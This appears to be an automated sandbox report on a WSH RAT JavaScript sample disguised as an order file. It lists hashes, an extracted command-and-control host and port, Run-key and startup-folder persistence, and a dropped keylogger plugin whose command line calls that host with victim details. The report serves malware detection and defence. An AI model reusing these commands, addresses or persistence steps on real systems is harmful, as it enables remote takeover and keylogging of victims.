Analysis
max time kernel: 147s
max time network: 152s
platform: windows7_x64
resource: win7-20240611-en
resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
submitted: 17-06-2024 11:10
Static task: static1
Behavioral task: behavioral1 (Sample: ORDER-24617-01667859-24.js, Resource: win7-20240611-en)
Behavioral task: behavioral2 (Sample: ORDER-24617-01667859-24.js, Resource: win10v2004-20240611-en)
General
Target: ORDER-24617-01667859-24.js
Size: 7KB
MD5: f3e6a7eba2bd6ca312768ac1560bad6f
SHA1: 04a683416a38f3c8acf06b64fd5e598a2902f684
SHA256: 7a06aaf3103d9dce60c0c4652fd505c7a8df42c826d486be1973008d1c22c838
SHA512: 4ea84c8c33a0fa6a235f6b5ec620e172a5ea5f4a9f372307ea9e1946d6393326bec448e32cadacb1c444270c973046a09be3c590fb7ae61fcc76999553e03265
SSDEEP: 48:95jUotZH9ZR0/kdlZK8rflZPos9ZPfBjBZfo5CvA7ehZvKoN69ZLi1t16r1SBZ5B:T0/ZYbukAKdrKBXB1XBdi
Malware Config
Extracted: wshrat
http://jinvestments.duckdns.org:7044
Signatures

Blocklisted process makes network request (25 IoCs)
Processes (flow, pid, process):
flow 3: pid 2176 wscript.exe
flows 7, 9, 10, 11, 12, 13, 14, 15, 17, 18, 19, 21, 22, 23, 25, 26, 27, 29, 30, 31, 33, 34, 35, 37: pid 2480 wscript.exe

Drops startup file (2 IoCs)
Processes (description, ioc, process):
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HTYBQC.vbs (WScript.exe)
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HTYBQC.vbs (wscript.exe)

Executes dropped EXE (1 IoCs)
Processes (pid, process):
pid 2152 kl-plugin.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
Processes (description, ioc, process):
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" (WScript.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" (WScript.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" (wscript.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTYBQC = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\HTYBQC.vbs\"" (wscript.exe)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
flow 6: ip-api.com

Command and Scripting Interpreter: JavaScript (1 TTPs)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Kills process with taskkill (1 IoCs)
Processes (pid, process):
pid 556 taskkill.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes (description, pid, process):
Token: SeDebugPrivilege, pid 556 taskkill.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes (pid, process):
pid 2152 kl-plugin.exe
pid 2152 kl-plugin.exe

Suspicious use of WriteProcessMemory (16 IoCs)
Processes (description, pid, process, target process):
PID 2176 wrote to memory of 2752: wscript.exe -> WScript.exe (3 times)
PID 2752 wrote to memory of 2480: WScript.exe -> wscript.exe (3 times)
PID 2480 wrote to memory of 2028: wscript.exe -> cmd.exe (3 times)
PID 2028 wrote to memory of 556: cmd.exe -> taskkill.exe (3 times)
PID 2480 wrote to memory of 2152: wscript.exe -> kl-plugin.exe (4 times)
Processes

Image: C:\Windows\system32\wscript.exe
Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\ORDER-24617-01667859-24.js
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory

Image: C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HTYBQC.vbs"
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory

Image: C:\Windows\System32\wscript.exe
Command line: "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\HTYBQC.vbs"
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory

Image: C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
- Suspicious use of WriteProcessMemory

Image: C:\Windows\system32\taskkill.exe
Command line: taskkill /F /IM kl-plugin.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken

Image: C:\Users\Admin\AppData\Roaming\kl-plugin.exe
Command line: "C:\Users\Admin\AppData\Roaming\kl-plugin.exe" jinvestments.duckdns.org 7044 "WSHRAT|F4850773|EILATWEW|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 6/17/2024|Visual Basic-v2.0|GB:United Kingdom"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\json[1].json
Filesize: 297B
MD5: be2ba1a8c142b5fa2178396ac67cb7d8
SHA1: b7c3d209d9c95d4b67d7ffb3c777d07f398260a5
SHA256: 1191fa5928ed7ebf51830c0e601a327fb6480e4f35d9f96962c828b5b45ea260
SHA512: cca824422ebcc194e96c6af6c66160409b6c4f9e30af387921ad55712fc4316866e7ac3b2806427f7e06e43e99ef56e612738261f8d38fb58ef2758dc13c9204

File: C:\Users\Admin\AppData\Local\Temp\HTYBQC.vbs
Filesize: 832KB
MD5: 9eb84b410320b27a000a848a1c22b91c
SHA1: 7b84f1301c73993648f0bdf254f1fc202a12aab8
SHA256: f44a15168c937d547a57015ccdf034d5f958fa9e9a159e09730b09acb17124dc
SHA512: 9ab878e70322df08ebe934e18b30d7b151f49a27ca99fafefa77fdd81ef3ed05700671d0e0dc22842355995fd2c5dc39442d60a9559635eda11ca17194d2d203

File: C:\Users\Admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\user.config
Filesize: 1KB
MD5: 6adab4c76fc078ab342c1543663b25b8
SHA1: 30f33a9d2ef56dfc9e5f8b48ebb38c5e4503e8c3
SHA256: 367d9883f14feff7473dd6936c4378e25c1829de2d5e835e767185b8637e5d3a
SHA512: 5162d86367bf0b02c123835098f5f141d5c36691e7d211684e9fed4b15185690ea3c8d2406d2432899ca64a58fde4743e640950c62480704bdce855a84131339

File: C:\Users\Admin\AppData\Roaming\kl-plugin.exe
Filesize: 25KB
MD5: 7099a939fa30d939ccceb2f0597b19ed
SHA1: 37b644ef5722709cd9024a372db4590916381976
SHA256: 272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a
SHA512: 6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721